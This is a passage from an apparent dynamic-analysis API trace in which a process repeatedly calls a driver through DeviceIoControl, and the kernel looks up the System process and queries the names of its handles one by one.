(ApcState=0xffffd000ac0cf400) [0288.634] PsReleaseProcessExitSynchronization () returned 0x2 [0288.634] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f8a0 [0288.634] ObQueryNameString (in: Object=0xffffe00069031ce0, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.634] ObfDereferenceObject (Object=0xffffe00069031ce0) returned 0x7fff [0288.634] IoCompleteRequest () returned 0x0 [0288.634] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.634] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.634] PsAcquireProcessExitSynchronization () returned 0x0 [0288.634] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.634] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069030680, HandleInformation=0x0) returned 0x0 [0288.634] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.634] PsReleaseProcessExitSynchronization () returned 0x2 [0288.634] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f89f [0288.634] ObQueryNameString (in: Object=0xffffe00069030680, ObjectNameInfo=0xffffe0006913a404, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006913a404, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.634] ObfDereferenceObject (Object=0xffffe00069030680) returned 0x7fff [0288.634] IoCompleteRequest () returned 0x0 [0288.634] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.634] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.634] PsAcquireProcessExitSynchronization () returned 0x0 [0288.634] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.634] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006902f2a0, HandleInformation=0x0) returned 0x0 [0288.634] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.634] PsReleaseProcessExitSynchronization () returned 0x2 [0288.634] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f89e [0288.634] ObQueryNameString (in: Object=0xffffe0006902f2a0, ObjectNameInfo=0xffffe00069121044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069121044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.634] ObfDereferenceObject (Object=0xffffe0006902f2a0) returned 0x7fff [0288.634] IoCompleteRequest () returned 0x0 [0288.634] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.635] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.635] PsAcquireProcessExitSynchronization () returned 0x0 [0288.635] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.635] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006902fa50, HandleInformation=0x0) returned 0x0 [0288.635] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.635] PsReleaseProcessExitSynchronization () returned 0x2 [0288.635] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f89d [0288.635] ObQueryNameString (in: Object=0xffffe0006902fa50, ObjectNameInfo=0xffffe000694407c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000694407c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.635] ObfDereferenceObject (Object=0xffffe0006902fa50) returned 0x7fff [0288.635] IoCompleteRequest () returned 0x0 [0288.635] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x78, lpOverlapped=0x0) returned 1 [0288.635] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.635] PsAcquireProcessExitSynchronization () returned 0x0 [0288.635] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.635] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069043990, HandleInformation=0x0) returned 0x0 [0288.635] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.635] PsReleaseProcessExitSynchronization () returned 0x2 [0288.635] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f89c [0288.635] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a70c7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a70c7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0288.635] ObfDereferenceObject (Object=0xffffe00069043990) returned 0x7ffb [0288.635] IoCompleteRequest () returned 0x0 [0288.635] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.635] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.635] PsAcquireProcessExitSynchronization () returned 0x0 [0288.635] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.635] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691d1b30, HandleInformation=0x0) returned 0x0 [0288.635] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.635] PsReleaseProcessExitSynchronization () returned 0x2 [0288.635] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f89b [0288.635] ObQueryNameString (in: Object=0xffffe000691d1b30, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.635] ObfDereferenceObject (Object=0xffffe000691d1b30) returned 0x7fff [0288.635] IoCompleteRequest () returned 0x0 [0288.635] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x82, lpOverlapped=0x0) returned 1 [0288.635] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.635] PsAcquireProcessExitSynchronization () returned 0x0 [0288.635] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.635] ObReferenceObjectByHandle (in: Handle=0xffffffff800006dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069030ca0, HandleInformation=0x0) returned 0x0 [0288.635] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.635] PsReleaseProcessExitSynchronization () returned 0x2 [0288.635] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f89a [0288.635] ObQueryNameString (in: Object=0xffffe00069030ca0, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.635] ObfDereferenceObject (Object=0xffffe00069030ca0) returned 0x7ff6 [0288.635] IoCompleteRequest () returned 0x0 [0288.636] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.636] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.636] PsAcquireProcessExitSynchronization () returned 0x0 [0288.636] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.636] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a387620, HandleInformation=0x0) returned 0x0 [0288.636] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.636] PsReleaseProcessExitSynchronization () returned 0x2 [0288.636] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f899 [0288.636] ObQueryNameString (in: Object=0xffffe0006a387620, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.636] ObfDereferenceObject (Object=0xffffe0006a387620) returned 0x7fff [0288.636] IoCompleteRequest () returned 0x0 [0288.636] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x82, lpOverlapped=0x0) returned 1 [0288.636] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.636] PsAcquireProcessExitSynchronization () returned 0x0 [0288.636] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.636] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006902f680, HandleInformation=0x0) returned 0x0 [0288.636] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.636] PsReleaseProcessExitSynchronization () returned 0x2 [0288.636] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f898 [0288.636] ObQueryNameString (in: Object=0xffffe0006902f680, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.636] ObfDereferenceObject (Object=0xffffe0006902f680) returned 0x7ffd [0288.636] IoCompleteRequest () returned 0x0 [0288.636] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.636] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.636] PsAcquireProcessExitSynchronization () returned 0x0 [0288.636] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.636] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006914c980, HandleInformation=0x0) returned 0x0 [0288.636] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.636] PsReleaseProcessExitSynchronization () returned 0x2 [0288.636] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f897 [0288.636] ObQueryNameString (in: Object=0xffffe0006914c980, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.637] ObfDereferenceObject (Object=0xffffe0006914c980) returned 0x7fff [0288.637] IoCompleteRequest () returned 0x0 [0288.637] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0xd2, lpOverlapped=0x0) returned 1 [0288.637] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.637] PsAcquireProcessExitSynchronization () returned 0x0 [0288.637] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.637] ObReferenceObjectByHandle (in: Handle=0xffffffff800006ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069362590, HandleInformation=0x0) returned 0x0 [0288.637] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.637] PsReleaseProcessExitSynchronization () returned 0x2 [0288.637] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f896 [0288.637] ObQueryNameString (in: Object=0xffffe00069362590, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.637] ObfDereferenceObject (Object=0xffffe00069362590) returned 0x7fff [0288.637] IoCompleteRequest () returned 0x0 [0288.637] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.637] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.637] PsAcquireProcessExitSynchronization () returned 0x0 [0288.637] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.637] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00079221340, HandleInformation=0x0) returned 0x0 [0288.637] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.637] PsReleaseProcessExitSynchronization () returned 0x2 [0288.637] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f895 [0288.637] ObQueryNameString (in: Object=0xffffe00079221340, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.637] ObfDereferenceObject (Object=0xffffe00079221340) returned 0x7fff [0288.637] IoCompleteRequest () returned 0x0 [0288.637] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x11c, lpOverlapped=0x0) returned 1 [0288.637] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.637] PsAcquireProcessExitSynchronization () returned 0x0 [0288.637] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.637] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069368ce0, HandleInformation=0x0) returned 0x0 [0288.637] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.637] PsReleaseProcessExitSynchronization () returned 0x2 [0288.637] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f894 [0288.637] ObQueryNameString (in: Object=0xffffe00069368ce0, ObjectNameInfo=0xffffe0006a65b044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a65b044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.637] ObfDereferenceObject (Object=0xffffe00069368ce0) returned 0x7fff [0288.637] IoCompleteRequest () returned 0x0 [0288.637] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.637] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.638] PsAcquireProcessExitSynchronization () returned 0x0 [0288.638] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.638] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f5d1c0, HandleInformation=0x0) returned 0x0 [0288.638] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.638] PsReleaseProcessExitSynchronization () returned 0x2 [0288.638] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f893 [0288.638] ObQueryNameString (in: Object=0xffffe00069f5d1c0, ObjectNameInfo=0xffffe0006a6fa7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fa7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.638] ObfDereferenceObject (Object=0xffffe00069f5d1c0) returned 0x7fff [0288.638] IoCompleteRequest () returned 0x0 [0288.638] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x11c, lpOverlapped=0x0) returned 1 [0288.638] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.638] PsAcquireProcessExitSynchronization () returned 0x0 [0288.638] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.638] ObReferenceObjectByHandle (in: Handle=0xffffffff800006fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069366070, HandleInformation=0x0) returned 0x0 [0288.638] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.638] PsReleaseProcessExitSynchronization () returned 0x2 [0288.638] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f892 [0288.638] ObQueryNameString (in: Object=0xffffe00069366070, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.638] ObfDereferenceObject (Object=0xffffe00069366070) returned 0x7fff [0288.638] IoCompleteRequest () returned 0x0 [0288.638] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.638] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.638] PsAcquireProcessExitSynchronization () returned 0x0 [0288.638] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.638] ObReferenceObjectByHandle (in: Handle=0xffffffff80000700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a388750, HandleInformation=0x0) returned 0x0 [0288.638] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.638] PsReleaseProcessExitSynchronization () returned 0x2 [0288.638] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f891 [0288.638] ObQueryNameString (in: Object=0xffffe0006a388750, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.638] ObfDereferenceObject (Object=0xffffe0006a388750) returned 0x7fff [0288.638] IoCompleteRequest () returned 0x0 [0288.638] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.638] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.638] PsAcquireProcessExitSynchronization () returned 0x0 [0288.638] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.638] ObReferenceObjectByHandle (in: Handle=0xffffffff80000708, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006923ff20, HandleInformation=0x0) returned 0x0 [0288.638] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.638] PsReleaseProcessExitSynchronization () returned 0x2 [0288.638] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f890 [0288.638] ObQueryNameString (in: Object=0xffffe0006923ff20, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.638] ObfDereferenceObject (Object=0xffffe0006923ff20) returned 0x7fdf [0288.638] IoCompleteRequest () returned 0x0 [0288.639] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0288.639] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.639] PsAcquireProcessExitSynchronization () returned 0x0 [0288.639] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000ac0cf400) [0288.639] ObReferenceObjectByHandle (in: Handle=0xffffffff8000070c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006936c420, HandleInformation=0x0) returned 0x0 [0288.639] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.639] PsReleaseProcessExitSynchronization () returned 0x2 [0288.639] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f88f [0288.639] ObQueryNameString (in: Object=0xffffe0006936c420, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.639] ObfDereferenceObject (Object=0xffffe0006936c420) returned 0x7f02 [0288.639] IoCompleteRequest () returned 0x0 [0288.639] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0288.639] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.639] PsAcquireProcessExitSynchronization () returned 0x0 [0288.639] 